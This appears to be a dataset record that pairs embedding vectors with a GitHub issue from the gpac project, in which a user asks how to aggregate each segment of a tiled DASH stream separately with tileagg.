-0.011939785443246365, -0.000009423240044270642, -0.004659327678382397, 0.0001664045557845384, 0.005837596021592617, 0.007718691136687994, -0.007433426100760698, -0.02202741615474224, 0.00234206672757864, 0.004403002560138702, 0.03456253558397293, -0.011303107254207134, 0.021465154364705086, 0.03605087473988533, 0.007015864364802837, -0.0029270665254443884, 0.016437876969575882, 0.0020071903709322214, -0.010931022465229034, 0.00138084776699543, 0.015015685930848122, -0.015007417649030685, -0.004630387760698795, 0.007495440077036619, -0.016900915652513504, 0.00466759642586112, 0.005081023555248976, -0.018323106691241264, -0.018008900806307793, 0.029667556285858154, 0.00933519285172224, -0.0061393980868160725, 0.0075202458538115025, 0.017893141135573387, 0.0023586037568747997, -0.011567700654268265, -0.00468413345515728, -0.01444515585899353, -0.008500069379806519, 0.01605752296745777, -0.0012795580551028252, -0.0036422961857169867, -0.022655826061964035, -0.023929182440042496, -0.018852293491363525, 0.0016464749351143837, -0.010864874348044395, 0.012493778020143509, -0.010732577182352543, -0.004696536343544722, 0.008822542615234852, -0.012047276832163334, 0.004754416178911924, 0.011377524584531784, 0.020555613562464714, -0.006833956111222506, 0.010964096523821354, 0.008483531884849072, -0.01242762990295887, -0.018703458830714226, -0.005585405044257641, 0.0036174904089421034, 0.024954482913017273, -0.012659149244427681, 0.004444345366209745, 0.013411587104201317, -0.005920281633734703, 0.013304096646606922, 0.008574485778808594, -0.007193638011813164, 0.012824520468711853, -0.0037353173829615116, -0.005978161469101906, 0.0037435858976095915, 0.019050737842917442, 0.013742329552769661, 0.0029952821787446737, 0.019282257184386253, -0.023565366864204407, 0.0027720313519239426, -0.020952504128217697, -0.025351373478770256, -0.011567700654268265, -0.019067274406552315, -0.0019007328664883971, 0.0158921517431736, -0.0017870402662083507, -0.004932189825922251, -0.005746642127633095, -0.00727632362395525, 0.003826271276921034, 0.007127489894628525, -0.018604235723614693, 0.01680169254541397, -0.0008392577874474227, 0.012741834856569767, -0.005019009578973055, 0.02432607300579548, 0.007222577929496765, -0.006197277922183275, 0.012485509738326073, -0.01835617981851101, 0.019381480291485786, 0.02343306876718998, 0.011112930253148079, -0.003080034628510475, 0.029733704403042793, -0.010724308900535107, -0.019960278645157814, -0.014511304907500744, 0.026145154610276222, 0.015883883461356163, 0.008314026519656181, 0.01986105553805828, -0.015809467062354088, 0.0028278438840061426, -0.002201501280069351, -0.00977342575788498, 0.0032268015202134848, -0.005697030574083328, 0.013113919645547867, -0.001677482039667666, 0.04799066111445427, 0.03859759122133255, -0.013304096646606922, 0.0033446282614022493, 0.016222894191741943, 0.008140387013554573, -0.010831800289452076, -0.0019110685680061579, -0.0005679460009559989, -0.031982749700546265, 0.002051633782684803, 0.020572151988744736, 0.00415908033028245, -0.008351234719157219, 0.015751587226986885, 0.012361481785774231, 0.01347773615270853, 0.0034314480144530535, -0.008475263603031635, -0.020423317328095436, -0.009947065263986588, 0.021217098459601402, 0.0013446728698909283, 0.012444167397916317, 0.0019379412988200784, -0.00811558123677969, 0.0018562893383204937, 0.043558720499277115, 0.0066851223818957806, 0.006023638416081667, -0.008475263603031635, -0.008404980413615704, 0.026012856513261795, -0.05040507763624191, 0.024507980793714523, 0.009806499816477299, -0.0038035328034311533, -0.02649243362247944, 0.0011183213209733367, 0.013337170705199242, 0.0008216871065087616, 0.0026934801135212183, -0.00429551163688302, -0.007458231877535582, 0.003348762635141611, 0.01739702746272087, -0.02971716783940792, -0.009161553345620632, -0.028460348024964333, 0.007239114958792925, 0.002311059506610036, -0.0012247789418324828, 0.013585226610302925, 0.012229184620082378, 0.011807489208877087, -0.008342966437339783, -0.0036546988412737846, 0.0036857060622423887, 0.011923248879611492, -0.00817759521305561, -0.0035451406147331, 0.0014976410893723369, -0.007768302224576473, -0.03707617521286011, 0.007396217435598373, 0.005176112055778503, 0.003640228882431984, 0.0002450849860906601, 0.0027740984223783016, 0.0055978079326450825, 0.011741340160369873, -0.010848336853086948, 0.00977342575788498, 0.01792621612548828, -0.002430953551083803, 0.019050737842917442, -0.02559942938387394, 0.011030245572328568, 0.006821553222835064, -0.006126995198428631, 0.0240449421107769, -0.013022965751588345, 0.004894981160759926, 0.01888536661863327, -0.00276169553399086, -0.00024973604013212025, 0.018604235723614693, -0.0045311651192605495, 0.015429113060235977, -0.007553319912403822, -0.006490811239928007, -0.0025777204427868128, -0.010931022465229034, -0.00604844419285655, 0.010062824934720993, -0.010831800289452076, 0.03896140679717064, 0.005750776268541813, 0.005391094367951155, 0.00761533435434103, 0.013734061270952225, 0.017512787133455276, 0.0019947874825447798, 0.002707950072363019, -0.012063813395798206, -0.00892176479101181, 0.0038738155271857977, 0.009434415027499199, -0.0076277367770671844, -0.004547702148556709, -0.0041094692423939705, 0.013452930375933647, 0.00798741914331913, -0.020555613562464714, 0.011146005243062973, 0.002043365268036723, -0.00429551163688302, -0.00013384714839048684, 0.008756393566727638, -0.0033756352495402098, -0.007917135953903198, 0.01623116247355938, 0.017380490899086, -0.009070598520338535, -0.00010639298125170171, 0.019761834293603897, 0.005477914121001959, 0.008264414966106415, 0.0073755462653934956, 0.015090103261172771, 0.009880917146801949, 0.0030076848343014717, -0.016851304098963737, 0.0002427594445180148, 0.020720984786748886, 0.02022487297654152, -0.007214309647679329, -0.0341656468808651, -0.0036133562680333853, 0.015685439109802246, 0.008458726108074188, 0.005630882456898689, -0.009211163967847824, 0.017893141135573387, -0.006838090717792511, -0.014941269531846046, 0.0009322789846919477, 0.0056804935447871685, 0.002242844086140394, 0.010244732722640038, -0.025136390700936317, 0.008938302285969257, 0.014246710576117039, -0.017562398687005043, 0.002521907677873969, 0.007507842965424061, -0.005635016597807407, -0.019497239962220192, -0.0018345844000577927, 0.018554626032710075, -0.002809239784255624, 0.059831224381923676, -0.027451584115624428, 0.003315688343718648, -0.002118815900757909, -0.012956817634403706, -0.007086147088557482, 0.030246354639530182, -0.010418372228741646, -0.008764662779867649, -0.01545391883701086, -0.001248550950549543, 0.003569946391507983, 0.02014218643307686, -0.0007198805687949061, 0.008136252872645855, -0.01667766459286213, 0.01548699289560318, -0.009682471863925457, -0.02134939469397068, 0.000195344488020055, 0.004165282007306814, 0.002619063016027212, 0.0018087452044710517, 0.006982790306210518, 0.01515625137835741, 0.004436076618731022, -0.015437382273375988, 0.008090775460004807, 0.015065297484397888, 0.016446145251393318, 0.02440875768661499, 0.015619290061295033, 0.011303107254207134, 0.019298795610666275, -0.0002506404125597328, 0.029055682942271233, -0.001938974834047258, 0.019811443984508514, 0.0023730737157166004, 0.003826271276921034, 0.00415908033028245, -0.009690740145742893, 0.01574331894516945, -0.025996319949626923, 0.004332719836384058, 0.01037702988833189, 0.00431204866617918, -0.018571162596344948, 0.008322294801473618, -0.008781199343502522, 0.01064162328839302, 0.011129467748105526, -0.008458726108074188, 0.008863884955644608, 0.015214131213724613, 0.006949715781956911, -0.007776570972055197, 0.00021911656949669123, 0.006982790306210518, -0.0120968883857131, -0.00997187104076147, -0.015710243955254555, 0.0039461650885641575, 0.009608054533600807, -0.008322294801473618, 0.019910667091608047, -0.0043823313899338245, 0.011038513854146004, 0.024160701781511307, 0.04590698704123497, 0.010476252064108849, 0.007681482471525669, -0.007937807589769363, -0.0029022609815001488, -0.0037497873418033123, -0.017810456454753876, -0.016644589602947235, -0.0012371817138046026, -0.028543032705783844, 0.0050314124673604965, 0.009153284132480621, -0.0029725434724241495, 0.02120056189596653, -0.009178089909255505, 0.003084169002249837, -0.012138230726122856, 0.00477922149002552, 0.019579924643039703, -0.002447490580379963, 0.007032401394098997, 0.0130643080919981, 0.003044893266633153, -0.0011193548562005162, 0.019993353635072708, -0.00024392221530433744, -0.00047880070633254945, -0.003729115938767791, 0.004123939201235771, -0.0028154412284493446, 0.021002115681767464, -0.0023131268098950386, 0.011112930253148079, -0.016198089346289635, -0.006825687829405069, -0.017380490899086, 0.017330879345536232, -0.0031585858669131994, -0.008781199343502522, -0.015511798672378063, 0.005668090656399727, 0.0012340809917077422, 0.024871796369552612, 0.0008909362368285656, -0.006259291898459196, 0.000014647606803919189, -0.012593001127243042, -0.0019451762782409787, 0.0018800614634528756, 0.011881905607879162, 0.0028237097430974245, -0.0000541008630534634, 0.0022242397535592318, 0.009541906416416168, -0.0014728354290127754, 0.021895119920372963, 0.0009090236853808165, 0.001792208175174892, -0.002848515287041664, 0.01790967769920826, 0.006155935116112232, 0.015809467062354088, -0.005254663061350584, 0.008388443849980831, 0.007321800570935011, 0.014039997011423111, 0.04028437286615372, 0.0007441694615408778, 0.007764168083667755, 0.019364943727850914, 0.0047213416546583176, -0.002174628432840109, 0.022043952718377113, -0.010219926945865154, -0.0035306706558912992, -0.007201906759291887, 0.00016188269364647567, 0.00552339106798172, -0.004208691883832216, -0.01313872542232275, -0.015875615179538727, 0.02538444660604, 0.03224734216928482, 0.017529325559735298, 0.0030593632254749537, -0.004956995602697134, 0.003970970865339041, -0.012361481785774231, 0.00448155403137207, 0.018571162596344948, 0.00024676453904248774, 0.0030614305287599564, -0.005386960227042437, -0.002712084213271737, 0.02596324495971203, 0.00015387253370136023, 0.0001727351627778262, 0.02045639231801033, 0.000042214822315145284, 0.009525368921458721, 0.012237452901899815, -0.014569184742867947, -0.003774592885747552, -0.03016366809606552, -0.006172472145408392, 0.02052254043519497, 0.009541906416416168, 0.009467489086091518, 0.006722330581396818, 0.00808250717818737, -0.010658160783350468, -0.024210313335061073, 0.014238442294299603, -0.01605752296745777, -0.016495756804943085, -0.008433920331299305, -0.008541411720216274, 0.0008025660645216703, -0.018273495137691498, 0.01499914936721325, 0.001934840576723218, 0.02194473147392273, -0.010054556652903557, 0.00373118300922215, -0.013684449717402458, 0.006933178752660751, 0.014593989588320255, -0.0004007662646472454, 0.0002379791985731572, 0.0007410687394440174, -0.00459317909553647, 0.017793918028473854, -0.018488476052880287, -0.010972365736961365, 0.003230935661122203 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
Currently I have been using tileagg to aggregate the input Tiled DASH stream into a single video output. I further need to carry on some processing on each of the frame observed. However i need to do this segment wise. So is there a way to aggregate each segment of the incoming DASH stream separately? Say an .mpd file with 3 segments of 2s should produce 3 HEVC streams instead of one 6 sec stream.
Filter to aggregate with respect to segments
https://api.github.com/repos/gpac/gpac/issues/2379/comments
2
2023-01-17T17:56:47
2023-01-17T22:21:29Z
https://github.com/gpac/gpac/issues/2379
1,536,802,903
2,379
false
This is a GitHub Issue repo:gpac owner:gpac Title : Filter to aggregate with respect to segments Issue date: --- start body --- Currently I have been using tileagg to aggregate the input Tiled DASH stream into a single video output. I further need to carry on some processing on each of the frame observed. However i need to do this segment wise. So is there a way to aggregate each segment of the incoming DASH stream separately? Say an .mpd file with 3 segments of 2s should produce 3 HEVC streams instead of one 6 sec stream. --- end body ---
547
[ -0.028797684237360954, 0.014734740369021893, -0.024005534127354622, -0.010427776724100113, 0.015899186953902245, -0.008024238049983978, -0.011644475162029266, 0.06046169996261597, -0.035859011113643646, 0.012219234369695187, 0.00942754652351141, -0.023318808525800705, 0.020945126190781593, -0.0026759901084005833, -0.016720272600650787, -0.0009741051471792161, -0.024244394153356552, 0.0015134086133912206, 0.005273603834211826, -0.0023176984395831823, 0.025573059916496277, -0.004370410460978746, -0.04577174410223961, 0.01472727581858635, 0.011398149654269218, 0.014570523053407669, -0.026901723816990852, 0.01177137065678835, -0.04601060599088669, 0.03230595588684082, 0.010606923140585423, 0.03803861886262894, -0.0007291793008334935, 0.006833665072917938, 0.004680183250457048, -0.0026629273779690266, 0.052489712834358215, 0.038247622549533844, -0.002360618906095624, -0.008180990815162659, -0.017735430970788002, 0.021646780893206596, -0.06646308302879333, 0.018287798389792442, -0.0029950933530926704, 0.024990836158394814, -0.006956827826797962, 0.03347040340304375, -0.017601072788238525, -0.0026461323723196983, 0.01813850924372673, -0.04063623398542404, -0.04275612533092499, -0.022199146449565887, -0.009688801132142544, -0.03063392825424671, 0.06052141636610031, 0.009240936487913132, -0.010338203981518745, 0.020780909806489944, 0.0267972219735384, -0.02543869987130165, -0.03711303323507309, 0.03176851570606232, 0.012390916235744953, -0.026483716443181038, -0.04460729658603668, 0.019616462290287018, -0.003926278091967106, 0.011465329676866531, 0.016690414398908615, -0.014600380323827267, 0.018317654728889465, -0.006960559636354446, 0.013794224709272385, -0.021766211837530136, 0.06001383438706398, 0.009360366500914097, 0.0024669866543263197, -0.006744091864675283, -0.07625638693571091, 0.03696374595165253, -0.05986454710364342, 0.018317654728889465, 0.03508271276950836, -0.021124273538589478, -0.009979913011193275, -0.048160355538129807, -0.0162724070250988, -0.029559053480625153, -0.0008794004679657519, 0.011875872500240803, 0.021228773519396782, -0.004844400566071272, -0.016302265226840973, 0.007106115575879812, -0.01123393326997757, 0.00030207523377612233, -0.03627701848745346, -0.033918265253305435, -0.02464747242629528, 0.026453860104084015, 0.018243011087179184, -0.013331431895494461, 0.044159434735774994, 0.01460784487426281, 0.00587448850274086, -0.039471786469221115, -0.022870944812893867, 0.07470379024744034, 0.027036083862185478, 0.005101922433823347, -0.016690414398908615, -0.00829295627772808, -0.039471786469221115, 0.018765520304441452, -0.022930659353733063, -0.05798351764678955, 0.009218542836606503, -0.0027898221742361784, 0.014055479317903519, -0.018780449405312538, -0.004866793751716614, 0.0012381585547700524, -0.008397458121180534, 0.04565231502056122, -0.02516998164355755, 0.00501234969124198, -0.006953095551580191, -0.004661522340029478, -0.059356965124607086, -0.03206709399819374, -0.03454527631402016, -0.03158937022089958, 0.018004151061177254, 0.005590841174125671, 0.011472794227302074, 0.04618975147604942, -0.01048002764582634, 0.01806386560201645, 0.01634705252945423, -0.0178996492177248, 0.03170880302786827, -0.027200300246477127, 0.005139244254678488, -0.0349334254860878, 0.010248631238937378, 0.03687417134642601, -0.022094646468758583, 0.01292088907212019, 0.0014704882632941008, 0.02964862622320652, -0.006602268200367689, -0.013070177286863327, 0.003243284998461604, 0.011181682348251343, -0.016765058040618896, 0.0017084162682294846, -0.0029838967602699995, -0.04720491170883179, 0.016959132626652718, -0.021333275362849236, 0.00024772502365522087, 0.027603378519415855, -0.02524462528526783, -0.0077256616204977036, 0.010681566782295704, 0.022960517555475235, -0.007165831048041582, 0.009188685566186905, 0.004956366494297981, 0.003767659654840827, 0.015115424990653992, 0.024975907057523727, -0.03132065385580063, -0.018407229334115982, 0.012988069094717503, 0.005583376623690128, -0.03690402954816818, 0.0026256053242832422, -0.042726267129182816, -0.02040768973529339, -0.010711424052715302, 0.0029335119761526585, 0.011047323234379292, -0.004803346004337072, 0.028588680550456047, -0.02098991349339485, 0.04159167781472206, -0.018556516617536545, 0.02278137020766735, 0.04845893383026123, 0.032365668565034866, -0.009502190165221691, 0.008322814479470253, -0.040307801216840744, -0.04547316953539848, -0.09160320460796356, 0.0025920155458152294, -0.009554441086947918, -0.03233581408858299, -0.01634705252945423, 0.017914578318595886, -0.003959868103265762, -0.008263099007308483, 0.004758559633046389, 0.00018486070621293038, 0.025811919942498207, 0.007177027408033609, -0.06413418799638748, -0.03890449181199074, -0.04126324504613876, 0.0349334254860878, 0.02797659859061241, -0.032604530453681946, -0.006479105446487665, 0.014518272131681442, -0.0033403222914785147, 0.005094457883387804, 0.006811271887272596, 0.03457513451576233, -0.010651709511876106, -0.004590610507875681, 0.012637241743505001, 0.018631160259246826, -0.01722785271704197, 0.009293187409639359, 0.0012334933271631598, -0.011995302513241768, 0.022079717367887497, 0.007404692005366087, 0.014600380323827267, 0.001078606816008687, -0.00891250278800726, 0.003254481591284275, -0.013697187416255474, 0.010091878473758698, -0.002681588288396597, 0.04714519530534744, 0.01881030574440956, 0.0060013835318386555, 0.04583146050572395, -0.006650786846876144, 0.018795378506183624, 0.0030622731428593397, 0.0292903333902359, -0.009778373874723911, 0.040307801216840744, -0.004191264510154724, -0.00650896318256855, -0.004045708570629358, -0.03353011608123779, 0.004467447753995657, -0.04406986013054848, -0.016212692484259605, 0.030260708183050156, 0.019004380330443382, 0.012913424521684647, -0.0164366252720356, -0.06717966496944427, 0.023005302995443344, 0.007591302040964365, -0.038158051669597626, -0.043203990906476974, -0.007053865119814873, -0.06317874044179916, 0.01454812940210104, -0.008487030863761902, 0.0038031155709177256, -0.004295766353607178, -0.04553288593888283, -0.0025341662112623453, -0.03615758940577507, -0.007651017513126135, -0.016212692484259605, 0.010718888603150845, 0.0018007882172241807, -0.025453628972172737, 0.017078563570976257, 0.013585221022367477, -0.034425847232341766, -0.014555593952536583, -0.005867023952305317, 0.03968079015612602, 0.011181682348251343, 0.01591411605477333, 0.030335351824760437, 0.00867364089936018, -0.058252234011888504, -0.016899418085813522, 0.02079583890736103, 0.026170212775468826, 0.0026237391866743565, 0.008860251866281033, 0.009031932801008224, -0.0019015577854588628, 0.005553518887609243, -0.003963600378483534, 0.01854158751666546, 0.015234855003654957, -0.04792149364948273, 0.018526658415794373, 0.04027794301509857, -0.0010086280526593328, -0.0500115305185318, -0.01174897700548172, -0.038247622549533844, 0.03591872751712799, -0.020497262477874756, -0.0031350511126220226, 0.03353011608123779, -0.030096489936113358, -0.022214075550436974, 0.02691665291786194, -0.0038441696669906378, 0.027245087549090385, 0.012711885385215282, 0.004351749550551176, -0.018168367445468903, -0.013152285479009151, -0.022214075550436974, 0.02237829379737377, -0.03738175332546234, 0.016645628958940506, -0.020183756947517395, -0.01992996782064438, -0.044517725706100464, -0.025587989017367363, -0.017197994515299797, 0.028409535065293312, 0.000443898985395208, 0.008121275343000889, -0.009203614667057991, -0.03144008293747902, -0.011457865126430988, -0.03496328368782997, -0.04206939786672592, -0.023244164884090424, 0.008509424515068531, -0.023587526753544807, -0.004034512210637331, 0.0007511060102842748, 0.009420081973075867, -0.0021422849968075752, 0.026170212775468826, 0.02031811699271202, -0.02064654976129532, 0.007860020734369755, 0.058282092213630676, 0.025334198027849197, 0.0008700699545443058, 0.004534627310931683, 0.0020452477037906647, 0.03678460046648979, 0.017720503732562065, 0.0037116764578968287, -0.0039449394680559635, -0.02667779102921486, 0.01142800785601139, -0.04269640892744064, 0.010644244961440563, -0.03523200377821922, -0.009494726546108723, 0.01909395307302475, -0.023154592141509056, 0.04359214007854462, -0.032365668565034866, -0.04398028925061226, -0.015391607768833637, -0.006090956274420023, -0.032007377594709396, 0.02608064003288746, -0.0256029162555933, -0.009696264751255512, -0.02505055069923401, 0.012913424521684647, 0.0009675737819634378, -0.011995302513241768, -0.026573289185762405, 0.01960153318941593, -0.04822007194161415, 0.0032022306695580482, 0.01667548529803753, -0.031380366533994675, 0.009823160246014595, 0.01333889551460743, -0.004859329201281071, 0.0078376280143857, -0.02218421921133995, -0.02718537114560604, -0.009599227458238602, 0.016212692484259605, -0.007117312401533127, -0.029036544263362885, -0.01830272749066353, -0.0014023755211383104, -0.030872788280248642, 0.005467678420245647, 0.03203723579645157, -0.013667330145835876, 0.02833488956093788, -0.02107948623597622, -0.017033778131008148, 0.03878505900502205, -0.012876102700829506, -0.002453923923894763, -0.0007072525913827121, 0.016854632645845413, 0.02254251018166542, 0.004844400566071272, 0.013204536400735378, -0.032246239483356476, -0.0174667127430439, -0.023766672238707542, 0.015070638619363308, 0.0035250664222985506, -0.011674333363771439, -0.014257017523050308, -0.05051910877227783, 0.02445339784026146, -0.018631160259246826, 0.008808000944554806, -0.02445339784026146, -0.003633300308138132, 0.006128278560936451, 0.01232373621314764, 0.028782755136489868, 0.009121505543589592, 0.028633465990424156, -0.05111626163125038, 0.025378985330462456, -0.010293417610228062, -0.02342331036925316, -0.022318577393889427, 0.037889331579208374, 0.023841317743062973, -0.021691568195819855, -0.006598535925149918, -0.00827802810817957, -0.014025621116161346, -0.016421696171164513, 0.014637703076004982, -0.00006735461647622287, 0.02199014462530613, 0.02024347335100174, -0.016018617898225784, -0.07422606647014618, -0.06449247896671295, 0.012808922678232193, -0.018556516617536545, 0.013025390915572643, 0.054281171411275864, -0.017093492671847343, -0.03588886931538582, 0.017511500045657158, 0.01380915381014347, 0.004926508758217096, 0.007665946148335934, 0.04759306088089943, 0.007740590255707502, -0.017630930989980698, -0.00141637132037431, 0.010920427739620209, 0.0011887068394571543, 0.028275175020098686, -0.03335097059607506, -0.029797913506627083, -0.017750360071659088, 0.006068563088774681, -0.02361738495528698, 0.005019813776016235, -0.008621390908956528, -0.01311496365815401, 0.026976367458701134, -0.03323154151439667, 0.024423541501164436, -0.005702807102352381, -0.05069825425744057, 0.017003919929265976, 0.006710502319037914, 0.005975258070975542, -0.03323154151439667, 0.019183527678251266, 0.026005994528532028, -0.04371156916022301, 0.0030566747300326824, 0.023945819586515427, -0.012398380786180496, -0.007400959730148315, 0.02460268698632717, 0.023706957697868347, -0.00014555593952536583, -0.0028308765031397343, -0.00593420397490263, 0.01901930943131447, 0.022288721054792404, -0.008778142742812634, -0.007748054806143045, 0.010211309418082237, -0.00052344158757478, -0.005516197066754103, 0.009636550210416317, 0.0012838781112805009, -0.05081768333911896, 0.0055609834380447865, -0.018198225647211075, -0.004717505536973476, 0.010136664845049381, -0.020377831533551216, -0.015451323240995407, -0.037769902497529984, 0.006542553193867207, -0.023408381268382072, -0.038128193467855453, 0.003358983201906085, -0.024035392329096794, 0.022333506494760513, -0.02524462528526783, 0.01248048897832632, -0.007949593476951122, -0.009711193852126598, -0.010203844867646694, -0.011860943399369717, 0.018168367445468903, -0.027080869302153587, 0.026647934690117836, -0.02072119526565075, -0.01065917406231165, 0.024975907057523727, -0.010345668531954288, -0.013764367438852787, -0.009121505543589592, -0.004351749550551176, 0.0508773997426033, 0.01298060454428196, -0.012256557121872902, -0.0264687892049551, 0.01694420538842678, 0.03448556363582611, -0.0003034748078789562, -0.026110496371984482, 0.04045708850026131, -0.0443684384226799, 0.026214998215436935, -0.03854620084166527, 0.04293527081608772, 0.0045644850470125675, 0.008598997257649899, -0.014234624803066254, 0.00022416548745241016, -0.017406998202204704, -0.011741512455046177, 0.005523661617189646, 0.017526429146528244, 0.020377831533551216, -0.0015768560115247965, 0.04203954339027405, 0.008785607293248177, 0.0019388798391446471, 0.00040144516970030963, 0.0021889375057071447, 0.007587570231407881, 0.04457744210958481, -0.010606923140585423, -0.012047553434967995, 0.023915961384773254, -0.01972096413373947, 0.020333046093583107, -0.020870482549071312, 0.013279180973768234, 0.006904576905071735, -0.010614386759698391, 0.0065350886434316635, -0.004937705583870411, 0.006785146426409483, 0.010778604075312614, 0.013861404731869698, 0.007651017513126135, -0.0162724070250988, 0.023079946637153625, -0.006270102225244045, -0.003151845885440707, 0.018004151061177254, 0.03347040340304375, 0.00018661018111743033, -0.018989453092217445, 0.006609732750803232, -0.003398171393200755, -0.02266194112598896, -0.00829295627772808, -0.018795378506183624, 0.02651357464492321, -0.0016962866066023707, -0.02591642178595066, 0.027887025848031044, -0.010129200294613838, -0.0009694399195723236, 0.018228081986308098, 0.011413078755140305, -0.0030006917659193277, -0.04099452495574951, 0.017078563570976257, -0.03747132420539856, -0.03735189512372017, -0.0036202375777065754, 0.00035525913699530065, 0.011935587041079998, 0.005975258070975542, -0.03708317503333092, 0.02079583890736103, -0.0048742578364908695, 0.0053445156663656235, 0.08139190077781677, -0.009793302044272423, 0.015167675912380219, 0.03385855257511139, 0.01651126891374588, -0.0027058476116508245, 0.0042845699936151505, 0.013279180973768234, 0.023244164884090424, -0.042009685188531876, 0.0346049927175045, 0.004568217322230339, 0.02543869987130165, 0.02309487573802471, -0.0023158323019742966, -0.018392300233244896, -0.001323999254964292, -0.02031811699271202, -0.01349564827978611, 0.0025938814505934715, -0.030574211850762367, -0.005277336109429598, -0.02103469893336296, -0.02366217039525509, 0.010950285941362381, 0.007296458352357149, -0.01021877396851778, 0.0004000455664936453, -0.024035392329096794, -0.013100034557282925, -0.002476317109540105, 0.01976575143635273, -0.023229235783219337, 0.004172603599727154, -0.0007455076556652784, -0.0017074831994250417, -0.007695803884416819, 0.01842215657234192, -0.016600841656327248, -0.009711193852126598, 0.04780206456780434, 0.011659404262900352, 0.03523200377821922, -0.03977036103606224, -0.012734279036521912, 0.03239552676677704, -0.011196610517799854, -0.000600418250542134, -0.025587989017367363, -0.02206478826701641, 0.012682028114795685, -0.017750360071659088, -0.010860712267458439, 0.025752205401659012, -0.003870295127853751, -0.010621851310133934, -0.014839241281151772, 0.03541114926338196, 0.022527581080794334, -0.034784138202667236, 0.01572004146873951, 0.0015572620322927833, 0.004083030857145786, 0.0033403222914785147, -0.00008175858965842053, -0.018317654728889465, 0.01770557463169098, 0.008360136300325394, -0.024199608713388443, -0.011099573224782944, -0.024020463228225708, 0.013197071850299835, -0.04254712164402008, 0.0021068290807306767, -0.015585682354867458, -0.0011140628485009074, -0.004045708570629358, -0.012510346248745918, 0.02960383892059326, 0.0035082714166492224, -0.0008985280292108655, 0.042308259755373, 0.006811271887272596, -0.00037578624323941767, -0.00030627395608462393, 0.025498416274785995, -0.029753128066658974, 0.007203152868896723, -0.025095338001847267, 0.014876564033329487, 0.006710502319037914, -0.01797429285943508, 0.003077202010899782, 0.0235427413135767, -0.012017696164548397, -0.007505461573600769, -0.02119891718029976, 0.008882644586265087, 0.019676176831126213, 0.022751513868570328, -0.013152285479009151, 0.004325624089688063, -0.006919505540281534, -0.011323506012558937, -0.00650896318256855, -0.04206939786672592, -0.051265548914670944, 0.02313966304063797, 0.0034541545901447535, -0.0016207094304263592, 0.0033309918362647295, -0.022273791953921318, -0.0030548085924237967, 0.02079583890736103, 0.023945819586515427, 0.006960559636354446, -0.011599688790738583, 0.010726353153586388, 0.005232549738138914, -0.01445109210908413, 0.010032163001596928, 0.0070053464733064175, -0.034784138202667236, -0.016003688797354698, -0.028349818661808968, 0.012905959971249104, 0.006781414151191711, -0.007348708808422089, -0.011510116048157215, -0.022452937439084053, 0.005799844395369291, -0.0027879560366272926, 0.004654057789593935, 0.009502190165221691, -0.011472794227302074, 0.015466252341866493, -0.036456163972616196, -0.026244856417179108, -0.008979681879281998, -0.004627932328730822, 0.02940976433455944, -0.027080869302153587, -0.014816848561167717, -0.010106807574629784, 0.01976575143635273, 0.0008649381925351918, 0.0015861865831539035, 0.009748515672981739, 0.02397567592561245, 0.011181682348251343, -0.00266852555796504, 0.005348247941583395, -0.0029540392570197582, -0.01615297794342041, -0.027483947575092316, -0.01622762158513069, 0.0024110034573823214, -0.005616966634988785, 0.007882414385676384, 0.0004154409107286483, -0.009755980223417282, -0.017690645530819893, 0.03430641442537308, 0.009935125708580017, 0.0009512454271316528, 0.024378754198551178, -0.007195688784122467, -0.01407040748745203, -0.022960517555475235, -0.01032327488064766, -0.029305262491106987, 0.0010431508999317884, -0.006934434175491333, -0.023468095809221268, 0.07028485834598541, 0.007128508761525154, -0.00034172990126535296, -0.013659865595400333, 0.003411234123632312, 0.006714234594255686, -0.015175140462815762, -0.015264713205397129, -0.003900152863934636, 0.0020769713446497917, 0.010091878473758698, 0.012995532713830471, -0.025035621598362923, -0.02448325604200363, 0.026364287361502647, 0.00712477695196867, 0.0007338445284403861, 0.011838549748063087, -0.029678482562303543, -0.00031070594559423625, -0.02909625880420208, -0.019302956759929657, -0.016451554372906685, 0.02837967686355114, -0.014018156565725803, -0.00948726199567318, 0.010069485753774643, -0.02531926892697811, 0.014570523053407669, 0.03385855257511139, 0.0014742204220965505, -0.029155975207686424, -0.018959594890475273, 0.016735201701521873, -0.012950746342539787, -0.0059080785140395164, 0.016287336125969887, 0.02096005529165268, -0.0122864143922925, -0.03454527631402016, -0.0054079629480838776, -0.0016654959181323647, 0.03517228737473488, -0.0069754887372255325, 0.010942821390926838, -0.000015920180885586888, -0.0316789448261261, 0.006124546285718679, -0.03084293194115162, 0.014772062189877033, 0.0005789580754935741, -0.018646089360117912, 0.004482376389205456, 0.028469249606132507, -0.017854861915111542, 0.018392300233244896, -0.003489610506221652, -0.028245316818356514, 0.004445054568350315, -0.033559974282979965, 0.015466252341866493, -0.01407040748745203, -0.0025397646240890026, 0.020034469664096832, 0.008382529020309448, 0.007423352915793657, 0.04275612533092499, 0.036336734890937805, -0.025692490860819817, -0.008628854528069496, 0.029633697122335434, -0.012659634463489056, 0.01168926153331995, -0.019377602264285088, 0.03144008293747902, -0.02854389324784279, -0.02278137020766735, -0.006296227686107159, 0.017675716429948807, -0.003017486771568656, -0.009375295601785183, -0.04218883067369461, -0.02040768973529339, 0.013391146436333656, -0.0055684479884803295, -0.006617197301238775, 0.01142800785601139, -0.032843392342329025, 0.018004151061177254, 0.013689722865819931, -0.028409535065293312, -0.005516197066754103, -0.0238114595413208, -0.02682708017528057, 0.0033627154771238565, -0.01631719432771206, -0.007740590255707502, 0.0015264713438227773, 0.049593523144721985, -0.02019868604838848, -0.012099804356694221, -0.008188454434275627, -0.00412781722843647, -0.02957398258149624, -0.011726584285497665, -0.024244394153356552, -0.014518272131681442, -0.022975444793701172, 0.012614848092198372, 0.008046630769968033, 0.00495263421908021, -0.009755980223417282, 0.01069649588316679, -0.03618744760751724, -0.007311386987566948, 0.0025341662112623453, 0.009673872031271458, -0.016854632645845413, 0.02390103228390217, 0.00431815953925252, 0.013898726552724838, -0.0004856529994867742, -0.02631950005888939, -0.019541818648576736, -0.0015927179483696818, -0.008763214573264122, 0.010554672218859196, -0.002631203504279256, -0.03565001115202904, -0.03588886931538582, -0.020228544250130653, 0.0015777890803292394, 0.0074308174662292, 0.03830733895301819, 0.003728471463546157, 0.032723963260650635, 0.025065479800105095, 0.012196841649711132, -0.007591302040964365, -0.005374373402446508, -0.009599227458238602, -0.005381837487220764, 0.011338435113430023, -0.01234612986445427, -0.0009694399195723236, 0.005732664838433266, -0.004754827357828617, -0.009755980223417282, 0.03929264098405838, -0.020945126190781593, -0.0004341019375715405, -0.012353594414889812, -0.025647703558206558, -0.03266424685716629, 0.031619228422641754, 0.014749668538570404, -0.004956366494297981, 0.01397337019443512, 0.016361981630325317, 